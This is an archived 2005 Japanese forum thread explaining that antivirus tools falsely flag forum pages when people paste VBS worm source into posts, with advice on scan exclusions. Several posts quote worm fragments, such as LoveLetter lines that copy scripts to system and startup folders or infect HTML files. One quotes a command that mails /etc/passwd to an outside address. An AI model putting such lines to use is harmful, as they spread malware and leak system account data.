[過去ログ] ノートンがvbsウィルスのソースに誤反応3 (1002レス)
上下前次1-新
このスレッドは過去ログ倉庫に格納されています。
次スレ検索 歴削→次スレ 栞削→次スレ 過去ログメニュー
1(15): 他のアンチウィルスソフトが反応する場合もあります 05/03/01 01:58:58 ID:??? AAS
只今2chでvbsのウィルスのソースを貼りノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるのでこのスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応このスレで報告願えると幸いです。
■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されることは無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダにhtmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
これらのファイルは削除しても全く問題ありませんが、該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされてしまうので警告が出ます。
■まとめと対策■
2ちゃんねる見ていたらvbsウィルスが検出された!
外部リンク[php]:info.2ch.net
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
外部リンク[php]:info.2ch.net
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
前スレ
ノートンがvbsウィルスのソースに誤反応
2chスレ:sec
ノートンがvbsウィルスのソースに誤反応2
2chスレ:pcqa
テンプレ>>1-10あたり
2(3): 05/03/01 01:59:38 ID:??? AAS
■既知のvbsウィルスのソース■
・VBS.Internal
出元は2chスレ:downloadだと思われる。
ダウソ板からいろんな板へ飛び火した模様。
・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)出元不明。ニュー速から?
一般論として「htm」「html」拡張子などを安易に検索対象から外すことは奨励されません。これを感染ターゲットにするウィルスが数種確認されています。
外部リンク[html]:www.symantec.com
Q.ウイルスコードが貼られているのにノートン反応しない。。。
A.ウイルスコードが貼られている2ちゃんねるのスレをテストページとして使用するのは奨励されない。
なぜなら、ここで言われているノートンの反応は単なる掲示板とスキャンエンジンの「仕様の衝突」であり、
これからも同じページを見ればその都度反応するという保証がないから。
仕様というものは、ある時突然変更されたりするもの。
ネットサーフィン中のウイルス対策ソフトの常駐動作確認は、テスト用に作られたEICARテストファイルにアクセスして行うべき。
EICARテストファイル(正常に常駐していればURLにアクセスと同時に反応します)
外部リンク[txt]:www.eicar.org
3: 05/03/01 01:59:46 ID:??? AA×
4(9): 05/03/01 02:00:21 ID:??? AAS
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
< => <
> => >
& => &
" => "
それぞれしっかり置換されていれば反応しない、ここの掲示板の問題。
ノートンが反応するのは、ここの掲示板(2Ch)の仕様なので気にする必要なし。
ここは、時に他のウィルス対策ソフトが反応する場合もある。
反応したらソースを見てみるといい。他の掲示板と違うことに気付くはずだ。
断言できることは、他のWebページでノートンが反応した場合は要注意ということ。
尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
外部リンク:find.2ch.net
■関連
ノートン入れたら2chに書きこめない人へ
外部リンク[php]:ansitu.s53.xrea.com
ノートンインターネットセキュリティ@2ちゃんねる検索
外部リンク:find.2ch.net
【ノートン入れたら2chに書きこめない】人へ@2ちゃんねる検索
外部リンク:find.2ch.net
5(2): 05/03/01 02:05:28 ID:??? AAS
補足ありましたらお願いします。
6: 05/03/01 02:06:29 ID:??? AAS
ニャンです
7(4): 05/03/01 18:00:01 ID:??? AAS
Q.2ちゃんねるの板開いただけで反応します。
A.スレッドタイトルにウイルスコードが貼られていることがあり、それに反応しています。
2ちゃんねるブラウザの場合、ログ保存フォルダの他にスレタイ・既読スレ履歴等を保存しているファイルやフォルダを除外。
各2ちゃんねるブラウザによってスレタイ・既読スレ履歴等を保存しているファイルやフォルダが異なるようなので
特定のドライブ、フォルダ、ファイルをウイルススキャンの対象から除外する方法
外部リンク:service1.symantec.com
↑を参考にお使いの2ちゃんねるブラウザのスレでお聞きください。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
外部リンク[php]:info.2ch.net
8: 05/03/02 00:36:43 ID:??? AAS
その他リンク@2ちゃんねる検索
エロサイト見たら…助けて下さい!
外部リンク:find.2ch.net
パソコン初心者総合質問スレッド
外部リンク:find.2ch.net
セキュリティ初心者質問スレッド
外部リンク:find.2ch.net
9: 05/03/03 00:26:00 ID:??? AA×
>>1-9
10(7): 05/03/03 01:13:35 ID:??? AAS
2ちゃんねるに貼られたウイルスコードに誤反応していたことがわかったら
インターネットエクスプローラの場合
ツール→インターネットオプション→インターネット一時ファイル、ファイルの削除
これをしないでウイルススキャンしたらインターネット一時ファイル(Temporary Internet Filesフォルダ)でウイルス反応がでます。
また、該当レスを再び読み込むとウイルス反応がでます。
2ちゃんねるブラウザを使って以下の設定をして2ちゃんねるを見ましょう。
2ちゃんねるブラウザの場合
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
外部リンク[php]:info.2ch.net
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
11(4): 05/03/03 02:43:55 ID:7F9C8/Th(1)調 AAS
よろ
kak.hta';ken=wdt'START
ms-its:mhtml:file://c:\
12(4): 05/03/03 18:20:43 ID:??? AAS
>>11
既出。
Wscript.KakWorm
2chスレ:pcqa
Bloodhound.Exploit.6
2chスレ:pcqa
13(2): 05/03/04 01:48:43 ID:hGA62fOr(1)調 AAS
外部リンク:c-au.2ch.net
このウイルスを解説してください
14(4): 05/03/04 22:18:30 ID:??? AAS
DAT落ち阻止て神戸♪
>>13
VBS.LoveLetter.Var
2chスレ:pcqa
ウイルスコードが貼られているのにノートン反応しないって人は>>2見てね。
15(3): 05/03/05 00:21:55 ID:hfT/sPqY(1)調 AAS
ありがとう
しかしラブレター1個だけではないはず。
カーネルやネットワークも入っている。
一つ一つ解説してください。
16(8): 05/03/05 19:06:57 ID:5lPM1YuQ(1)調 AAS
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
↑こういうのって最初に気づいた奴って天才だよな
17(18): cen ◆Pm9xOTJuM. NG NG AAS
あ。そうそう。
>>16 みたいなスクリプトを誤反応しないような、datファイルに
datを作り変えるプログラム作ってみました。
よかったら使ってみてください。
外部リンク[html]:www.geocities.jp
18(3): 05/03/05 22:58:07 ID:??? AAS
あやすい・・・・・
19(7): cen ◆Pm9xOTJuM. NG NG AAS
>>18
自分のパソコンで何度も実行してますが、大丈夫ですよー。
さっき総質で見た、未対応のスクリプトに対応させました。
20(1): 名無しさん@お腹いぱーい。 NG NG AAS
>>17,19
ご支援ありがとうございます。
外部リンク:ansitu.xrea.jp
21(2): 05/03/06 22:26:34 ID:NzpAHwS7(1)調 AAS
ここの1の解説キボン
外部リンク:c-au.2ch.net
22(3): 05/03/06 22:32:03 ID:??? AA×
23(5): 05/03/09 04:14:09 ID:??? AAS
hoshu
24(5): 05/03/09 22:29:16 ID:??? AAS
未だにVIPの板更新すると、ノートン先生の逆鱗に触れてしまうオイラですが
2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません)
らしいです、騒いでごめんなさい。
2chにかぎっては心配(゚听)イラネみたいです。
25(2): 24 05/03/09 22:30:49 ID:??? AAS
誤爆すいません
26(2): 05/03/10 12:00:18 ID:??? AAS
>>24
スレタイにウィルスコードが書いてある模様。
27(6): [age] 05/03/11 19:52:34 ID:??? AAS
>>24
漏れもソレダ!!!
もう無視しまくりんぐwwwwwww
28(4): 05/03/11 19:54:19 ID:2tTtEvgw(1)調 AAS
ノートンなんか使ってんなよ ハゲ
29(3): 05/03/11 20:20:02 ID:??? AAS
A Boneを使用してるのですが、PC初心者の上の「初心者の質問」板をクリックするだけで、ノートンがウイルスを検知してしまいます。
しかも板を開く事もできません。毎回そうなってしまいます。
昨日、システムをスキャンしたら確かに感染していました。「初心者の質問」板だけ毎回そうなります。
これは何でしょうか?
30(2): 05/03/11 21:00:24 ID:??? AAS
ぐはははははwwwVIPもそうだよ
31(3): 名無しさん@お腹いぱーい。 NG NG AAS
>>29
>>7見てね。
32(1): 05/03/12 00:37:07 ID:eI8qHG/W(1)調 AAS
2ちゃんを普通に見ていただけなのにノートンから「ウィルス名は
Unix.Penguinで、ファイルを修復できません」と表示されてしまいました。何か対策は無いでしょうか?
ちなみに誤作動との見分け方はありますか?
33(6): 05/03/12 04:45:56 ID:??? AA×
34(5): 05/03/12 21:15:24 ID:KI7PmLwk(1)調 AAS
Open Janeをでスレを見てたらウィルスコードが張られてて
ウィルス警告が出てファイルが修復出来ませんとでました。
ウィルスコードをNGワードに入れたら、NGワードが全部消えて
デスクトップにあるNGWordtxtというアイコンを削除しようとすると
やはりウィルス警告が出て削除できません。
スキャンをするとあるファイルの所まで来ると電源が切れてしまいます。
ウィルス名は「Bloodhound.Exploit6」と出るのですが、どうしたらいいでしょうか・・・。
35(4): 05/03/12 21:50:19 ID:??? AA×
>>34
36(2): 34 05/03/12 23:34:38 ID:??? AAS
すみません。
1つは解決しましたがスキャンすると電源が落ちるのは直りませんので
これは他のスレで聞いてみます
37(1): 05/03/17 15:26:43 ID:??? AAS
なんだ、最近多いと思ってたがウィルスコードのせいだったのか。
しかしこれってあぼーんされないのかな。
とりあえずここみて安心した。ありがと。
38(2): 2005/03/26(土) 15:19:56 ID:Yoan0Q7l(1/7)調 AAS
Norton Anti Virusと使ってます。
ウイルス、Unix PenguinをNGワードに登録するには
どんな単語をNGワードにすればいいんですか?
Unix Penguinと反応するスレ内見てもそれらしい書き込みがないので分かりません。
39(7): 2005/03/26(土) 16:10:26 ID:??? AAS
>>38
NGワードに登録するんではなく
Norton Anti VirusのオプションのAuto-Protectと手動スキャンでログフォルダを除外に指定しる
40(9): 2005/03/26(土) 16:12:46 ID:Yoan0Q7l(2/7)調 AAS
>>39
いや、それはやってるんですけど、反応するんです。
多分、キャッシュフォルダの方も除外指定にしないとだめっぽいです。
でも、それはセキュリティー的によくないってどっかに書いてあったんで、
NGワードに登録したいんですけど、できないんでしょうか?
上下前次1-新書関写板覧索設栞歴
あと 962 レスあります
スレ情報 赤レス抽出 画像レス抽出 歴の未読スレ
ぬこの手 ぬこTOP 0.091s